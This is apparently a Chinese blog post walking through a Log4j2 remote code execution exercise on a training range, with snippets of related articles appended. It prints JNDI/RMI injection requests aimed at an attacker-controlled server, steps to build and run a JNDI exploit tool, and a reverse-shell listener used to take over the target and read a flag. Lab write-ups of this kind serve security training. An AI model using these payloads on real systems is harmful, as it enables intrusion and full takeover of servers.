封神台Apache Log4j任意代码执行复现踩坑到复现成功版

已于 2024-05-19 11:04:15 修改
阅读量1.2k 收藏 32
点赞数 18
分类专栏: 靶场日记 文章标签: apache log4j 网络安全 web安全 安全 安全威胁分析
于 2024-05-19 11:01:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/JACKBREAK/article/details/139039501
版权

Apache Log4j任意代码执行漏洞简介

log4j是Apache的一个开源项目,是一个基于Java的日志记录框架。Log4j2是log4j的后继者,被大量用于业务系统开发,记录日志信息。很多互联网公司以及耳熟能详的公司的系统都在使用该框架。Apache Log4j2 组件在开启了日志记录功能后,凡是在可触发错误记录日志的地方,插入漏洞利用代码,即可利用成功。特殊情况下,若该组件记录的日志包含其他系统的记录日志,则有可能造成间接投毒。通过中间系统,使得组件间接读取了具有攻击性的漏洞利用代码,亦可间接造成漏洞触发。

开启靶场环境

通过对Log4j产生的原理的了解我们可以大致了解到也就是说如果目标没有对我们输入的内容做一些过滤和校验就会使得使目标远程访问到一个LDAP服务请求到一个恶意的class文件从而加载恶意的class文件执行恶意代码
就如下图所示:

开始复现

我们先随便输入账户和密码,拦截到登录的请求包

POST /zkaq/log4jrce HTTP/1.1
Host: d63bb2586.lab.aqlab.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Origin: http://d63bb2586.lab.aqlab.cn
Authorization: Basic emthcTp6a2Fx
Connection: close
Referer: http://d63bb2586.lab.aqlab.cn/
Upgrade-Insecure-Requests: 1
username=admin&password=123456

 我们正常发送请求就像如图所示

但如果我们另起一个LDAP服务,让其请求的时候直接请求我们的LDAP Server呢,LDAP Server返回恶意exp,然后恶意的class文件再被发送到HTTP server执行

使用dnslog测试是否能远程请求地址

来到Dnslog平台

DNSLog Platform

 这里拿到的地址是9c5c3w.dnslog.cn(每个人的都不一样)

此时我们来到那个登录页面,使用jndi注入请求我们刚刚拿到的Dnslog地址

如果存在漏洞,点击登录后我们会在Dnslog平台看到一条dns请求

踩坑点1:

这个时候我怎么刷新记录都没有看到请求的记录
这个时候我们看一下请求的数据包:

POST /zkaq/log4jrce HTTP/1.1
Host: d63bb2586.lab.aqlab.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
Origin: http://d63bb2586.lab.aqlab.cn
Authorization: Basic emthcTp6a2Fx
Connection: close
Referer: http://d63bb2586.lab.aqlab.cn/
Upgrade-Insecure-Requests: 1
username=%24%7Bjndi%3Aldap%3A%2F%2F9c5c3w.dnslog.cn%7D&password=

发现payload被URL编码了
把payload再重发器中再发送一遍

 此时再刷新dnslog平台,发现它确实可以远程去请求一个地址,漏洞存在

在VPS上面使用JNDI注入工具JNDI-Injection-Exploit也起一个LDAP服务

小坑点1:JNDI-Injection-Exploit项目地址
GitHub - Mr-xn/JNDIExploit-1: 一款用于 JNDI注入 利用的工具,大量参考/引用了 Rogue JNDI 项目的代码,支持直接植入内存shell,并集成了常见的bypass 高版本JDK的方式,适用于与自动化工具配合使用。(from https://github.com/feihong-cs/JNDIExploit)
使用git clone https://github.com/Mr-xn/JNDIExploit-1.git 将项目克隆到vps上

 小坑点2:
刚刚将JNDI-Injection-Exploit克隆到vps后,cd JNDI-Injection-Exploit你是看不到JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar文件和target目录的,你需要在JNDI-Injection-Exploit目录下执行 “mvn clean package -DskipTests”
出现这个标志就代表成功了

此时就能看见JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar文件和target目了

 小坑点3:
使用java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar 的时候报错,大概率是vps上还没有Java环境

安装Java环境:

sudo apt update
sudo apt install default-jre
sudo apt install default-jdk

 详细内容可以参考【Ubuntu】安装Java 环境和配置环境变量-优快云博客

安装完成

总结需要执行的命令:
依次执行 

    1.cd JNDI-Injection-Exploit
    2.mvn clean package -DskipTests
    3.cd target
    4.java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "你要执行的命令" -A "你的vps主机ip地址"

这里我执行的是一个反弹shell的命令,将靶机的shell权限反弹到我的VPS主机上

关于反弹shell详细可参考反弹shell 看这一篇就够了_定时任务反弹shell-优快云博客

再起一个终端使用nc -lvvp 6666 监听本地的666端口

 

这里是工具给我们提供的payload,我们随便选取一个

----------------------------JNDI Links---------------------------- 
Target environment(Build in JDK 1.7 whose trustURLCodebase is true):
rmi://x.x.x.x:1099/8ep29j
ldap://x.x.x.x:1389/8ep29j
Target environment(Build in JDK 1.8 whose trustURLCodebase is true):
rmi://x.x.x.x:1099/ldnkd8
ldap://x.x.x.x.175:1389/ldnkd8
Target environment(Build in JDK whose trustURLCodebase is false and have Tomcat 8+ or SpringBoot 1.2.x+ in classpath):
rmi://x.x.x.x:1099/uznw84
如我们选取rmi://x.x.x.x:1099/ldnkd8这个payload

将payload放到burpsuite中重新请求

POST /zkaq/log4jrce HTTP/1.1
Host: d63bb2586.lab.aqlab.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 50
Origin: http://d63bb2586.lab.aqlab.cn
Authorization: Basic emthcTp6a2Fx
Connection: close
Referer: http://d63bb2586.lab.aqlab.cn/
Upgrade-Insecure-Requests: 1
username=${rmi://x.x.x.x:1099/ldnkd8}&password=

 点击send

坑点4:
send之后怎么都没成功,这个时候可以试一下其他的payload,一共给出了5个payload

但是我这里的原因是vps的防火墙没有开放nc 监听的6666端口,去自己的vps上设置一下防火墙规则

最后send!

反弹shell成功

最后再使用cat flag.txt把flag读出来就好啦

【漏洞复现Apache Log4j2 远程代码执行漏洞
李火火的安全圈
07-20 1080
ApacheLog4j2是一个·基于Java的日志记录工具,该工具重写了Log4j框架,并且引入大量丰富的特性,该日志框架被大量用于业务系统开发,用来记录日志信息。由于Log4j2组件在处理程序日志记录时存在JNDI注入缺陷,未经授权的攻击者利用该漏洞,可向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。......
【靶机实战】Apache Log4j2命令执行漏洞复现
qq_21039641的博客
07-04 999
Apache Log4j2 是一个广泛使用的 Java 日志记录库,它允许开发者将日志信息输出到不同的目的地。2021年12月,一个严重的漏洞(CVE-2021-44228)被发现,这个漏洞允许攻击者通过构造特定的输入,利用 Log4j2 的 JNDI(Java Naming and Directory Interface)功能,远程执行任意代码。
Apache log4j远程代码执行漏洞复现
qq_46162550的博客
05-11 1939
Apache log4j远程代码执行漏洞复现(1) 漏洞原理:(2) 漏洞复现环境:(3) 漏洞复现过程: (1) 漏洞原理: Apache Log4j2 中存在JNDI注入漏洞,当程序将用户输入的数据进行日志记录时,即当log4j打印的日志内容中包含${jndi:ldap://my-ip}时,lookup会将jndi注入可执行语句执行,程序会通过ldap协议访问my-ip这个地址,然后my-ip就会返回一个包含java代码的class文件的地址,然后程序再通过返回的地址下载class文件并执行,从而达成漏
CVE-2021-44228 Apache Log4j 远程代码执行漏洞 复现分析
徐徐徐的博客
02-20 1445
2021年12月10日,阿里云安全团队发现 Apache Log4j 2.15.0-rc1 本存在漏洞绕过。2021年12月15日,Apache官方发布Log4j 2.16.0 以及 2.12.2 本,修复CVE-2021-45046 Apache Log4j 拒绝服务与远程代码Apache Log4j2是一款优秀的Java日志框架。由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞。
掌控者-封神台-Apache Log4j任意代码执行复现
weixin_43821278的博客
04-06 5933
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 Apache Log4j任意代码执行复现一、工具二、靶场三、步骤总结 一、工具 JNDIExploit-1.2-SNAPSHOT.jar 二、靶场 看网页源码 猜测就是username和password为注入点 三、步骤 vps有java环境 java -jar JNDIExploit-1.2-SNAPSHOT.jar -i vps的IP 成功运行 向密码框填入${jndi:ldap://vps的IP:1389/Basic/Comm.
Apache Log4j任意代码执行复现
cainsoftware的博客
07-20 614
这里会报错提示Exceptioninthread"LDAPListenerclientconnectionreader的错误。这里主要说明因为java本使用java1.8.02导致复现失败,遇到的问题。这里下载对应服务器本的8u201的本。然后就可以正常使用了。...
分析复现Apache核弹级漏洞,利用Log4j2使目标服务器执行任意代码
我就说我500的博客
12-11 6674
12月9日晚间,ApacheLog4j2被曝光存在严重漏洞,可以随意执行任意远程代码,本贴将详细分析事故原因及实战复现此漏洞! 一.事件详情 1.事件经过 2021年12月9日,国内多家机构监测到Apache log4j存在任意代码执行漏洞,并紧急通报相关情况。由于ApacheLog4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞。 该漏洞CVSS评分达到了满分10分,影响全球一大半的互联网企业,包括百度、苹果等企业都被爆出存在该漏洞,众多媒体将这个漏洞形容成“史诗级”“核.
Apache Log4j2(CVE-2021-4101)远程代码执行漏洞复现
今天是几号的博客
04-12 3332
Apache log4jApache的一个开源项目,Java的日志记录工具(同logback)。log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。 影响范围 Apache Log4j 2.x
C4D零基础到三维封神课程-视频教程网盘链接提取码下载 .txt
03-18
C4D修神记:零基础到三维封神,全球MotionAward评委、MOMENTOR创始人曾潇霖携手翼狐网主编谭天。行业名师帮你打基础,拒绝纸上谈兵。避免入门就入土,整套课程用16小时对5大具体案例进行剖析,让你省时省力轻松学会C4...
zfs.rar_ZFS_真封神_真封神源代码_真封神网站 代码
09-14
《真封神》是一款深受玩家喜爱的网络游戏,其背后运行的服务器端代码是游戏运营的基础。这个名为"zfs.rar"的压缩包包含了《真封神》的源代码,特别是针对网站部分的ASP源代码,这对于我们理解游戏的后台运作机制具有...
远古封神+英雄远征的ERLANG游戏服务器代码
12-09
《远古封神》与《英雄远征》是两款受欢迎的网络游戏,它们的后端服务器采用了ERLANG这一编程语言来构建。ERLANG是一种为并发、分布式和容错系统设计的函数式编程语言,因其在实时系统和大规模并发处理中的优秀性能而...
封神台】漏洞挖掘与代码审计 wp
孤桜懶契
08-15 676
前言 掌控安全里面的靶场漏洞挖掘与代码审计,练练手! 本地包含漏洞审计 环境 :http://wjbh522a.zs.aqlab.cn/ 默认弱密码登陆 admin admin 登陆之后发现是个4.8.1的本,其实这题做的方法太多了,也可以不用代码审计,网上有一堆payload远程文件包含,不过这个靶场说下源代码审计,那就看看。 下载源码:https://www.phpmyadmin.net/files/4.8.1/ 因为提示说了文件包含,直接全局搜索include 分析
触屏Java游戏 c封神榜.jar(含截图+源代码 )
06-23
触屏Java游戏 c封神榜.jar(含截图+源代码 )触屏Java游戏 c封神榜.jar(含截图+源代码 )触屏Java游戏 c封神榜.jar(含截图+源代码 )触屏Java游戏 c封神榜.jar(含截图+源代码 )触屏Java游戏 c封神榜.jar(含截图...
Apache Log4j2 远程代码执行漏洞复现
renyizou的博客
03-06 5132
靶场: Vulfocus 靶场环境 目前 Vulfocus 已经集成 Log4j2 环境,可通过以下链接启动环境测试:http://vulfocus.fofa.so/#/dashboard?image_id=3b8f15eb-7bd9-49b2-a69e-541f89c4216c 也可通过 docker pull vulfocus/log4j2-rce-2021-12-09:latest 拉取本地环境运行。 漏洞复现: 我是本地复现: 环境: *服务器地址:kali ip(192.168.30.1
Apache Log4j2漏洞复现
weixin_51151498的博客
01-23 1569
Apache Log4j2漏洞
Log4j 任意代码执行漏洞,组件升级
Xzh_java的博客
11-30 352
任意代码执行2021 年 12 月 9 日,该项目被曝存在 严重安全漏洞 ,攻击者只需要向目标机传入一段特殊代码,就能触发漏洞,自由地在远程执行任意代码来控制目标机器!Apache Log4jApache 的一个开源项目,Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。
【漏洞复现】2.Apache Log4j2远程代码执行漏洞(CVE-2021-44228)复现分析
Zichel77的博客
03-21 2178
Apache 是当今世界上非常流行的跨平台Web服务端,有着良好的扩充性。而Log4j则是Apache的开源组件,用于日志管理,功能强大。Log4j来源于 Apache 软件基金会的日志服务项目,是一种Java日志框架,从最初Log4j1发展到现在的Log4j2,已经广泛应用于各行各业的业务开发。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。
Log4j远程代码执行漏洞环境搭建及复现
m0_71263989的博客
02-20 1952
Log4j2 是一个用于 Java 应用程序的成熟且功能强大的日志记录框架。它是 Log4j 的升级本,相比于 Log4jLog4j2 在性能、可靠性和灵活性方面都有显著的改进。
Apache Log4j2远程代码执行漏洞(CVE-2021-44228)复现
qq_40640917的博客
01-10 2627
Apache Log4j2 存在远程代码执行漏洞,该漏洞是由于Apache Log4j2某些功能存在递归解析功能,未经身份验证的攻击者通过发送特定恶意数据包,可在目标服务器上执行任意代码。Apache Log4j2是一个开源的Java日志框架,被广泛地应用在中间件、开发框架与Web应用中。攻击机参数:Kali(或安装有msfconsole的任意Linux/Windows操作系统)靶机容器:vulfocus/log4j2-rce-2021-12-09。靶机参数:Centos8.1。
封神台system
最新发布
03-25
### 封神台 SYSTEM 权限获取与相关操作 封神台是一个虚拟化渗透测试靶场,旨在帮助安全研究人员和爱好者提升技能水平。以下是关于如何在封神台中实现 `SYSTEM` 权限的具体过程及相关知识点。 #### 获取 `SYSTEM` 权限的过程 在一个典型的场景下,可以通过以下方式获得目标系统的最高权限: 1. **利用漏洞提权** 如果存在已知的安全漏洞(如 SQL 注入),可以借助这些漏洞执行恶意代码并进一步提升权限[^3]。例如,在某些情况下,攻击者可能通过 WebShell 控制服务器,并尝试寻找本地提权的机会。 2. **使用 exploit 工具** 当发现特定本的操作系统或软件存在的零日漏洞时,可以直接应用对应的 exploit 脚本来完成提权动作。比如输入命令 `iis6.exe "whoami"` 可验证当前运行身份是否已经切换至 System 用户级别[^2]。 3. **创建新账户加入 Administrators 组** 提升后的下一步通常是新建一个具有完全管理能力的新账号以便后续维护访问需求。此步骤通常涉及 PowerShell 或 CMD 下面的一些指令来新增成员以及将其纳入高级别群组之中。 4. **确认 RDP (Remote Desktop Protocol)** 接下来要做的便是查找远程桌面协议所使用的具体端口号,默认应该是 3389 。这一步骤可通过组合运用 `netstat -ano | findstr :<port>` 和任务列表中的 PID 对应关系得出结论[^5]。 #### 实际案例解析 以第五章为例,“SYSTEM POWER!”章节重点讲述了 webshell 的部署及其带来的潜在危害。其中提到过利用 tasklist 命令配合参数 `-svc` 审查服务进程详情表单里有关 Termservice 的记录编号即为 2408 ,从而间接推测出关联网络接口监听地址可能是标准设定下的 3389 端口。 另外值得注意的是第四则参考资料还提及到了一种基于主机名结构拆解的技术手段用于辅助定位内部 IP 地址范围内的其它活动站点链接信息[^4]。 ```bash # 示例代码片段展示如何查询指定条件下的所有连接状况 netstat -ano | findstr ":3389" ``` --- ###
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值